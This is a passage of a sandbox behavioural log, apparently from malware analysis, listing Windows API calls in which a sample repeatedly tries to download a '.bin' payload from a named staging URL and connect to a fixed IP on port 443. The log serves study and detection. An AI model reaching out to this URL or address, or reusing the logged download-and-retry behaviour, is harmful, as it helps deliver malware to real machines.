"value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1479 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc005c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1480 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1481 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004e0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1482 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1483 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1484 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1485 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcal\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1486 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1487 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1488 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1489 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1490 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1491 }, { "timestamp": "2025-02-27 23:35:51,003", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1492 }, { "timestamp": "2025-02-27 23:35:51,003", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1493 }, { "timestamp": "2025-02-27 23:35:51,003", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1494 }, { "timestamp": "2025-02-27 23:35:51,003", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc005c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1495 }, { "timestamp": "2025-02-27 23:35:51,003", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1496 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1497 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0060", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1498 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1499 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0060" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1500 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1501 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004dc", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1244" } ], "repeated": 0, "id": 1502 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004dc" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1503 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004dc" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1504 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1244" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1505 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004dc" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcam\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1506 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1244" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1507 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004dc" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1508 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004dc" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1509 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1244" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1510 }, { "timestamp": "2025-02-27 23:35:52,019", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1244" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1511 }, { "timestamp": "2025-02-27 23:35:56,034", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1244" } ], "repeated": 0, "id": 1512 }, { "timestamp": "2025-02-27 23:35:56,034", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 1513 }, { "timestamp": "2025-02-27 23:35:56,034", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0060" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1514 }, { "timestamp": "2025-02-27 23:35:56,034", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1515 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1516 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0064", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1517 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1518 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0064" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1519 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c8" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1520 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000488" } ], "repeated": 0, "id": 1521 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d0" } ], "repeated": 0, "id": 1522 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1523 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d8" } ], "repeated": 0, "id": 1524 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004e8" } ], "repeated": 0, "id": 1525 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c8" } ], "repeated": 0, "id": 1526 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004e4" } ], "repeated": 0, "id": 1527 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1528 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004e4", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1252" } ], "repeated": 0, "id": 1529 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1530 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1531 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1252" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1532 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e4" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcan\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1533 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1252" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1534 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1535 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1536 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1252" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1537 }, { "timestamp": "2025-02-27 23:35:57,050", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1252" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1538 }, { "timestamp": "2025-02-27 23:36:01,066", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1252" } ], "repeated": 0, "id": 1539 }, { "timestamp": "2025-02-27 23:36:01,066", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1540 }, { "timestamp": "2025-02-27 23:36:01,066", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0064" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1541 }, { "timestamp": "2025-02-27 23:36:01,066", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1542 }, { "timestamp": "2025-02-27 23:36:01,066", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1543 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0068", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1544 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1545 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0068" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1546 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1547 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00760000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1548 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72daf243", "parentcaller": "0x72dccab8", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 24, "id": 1549 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004e0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1550 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1551 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": 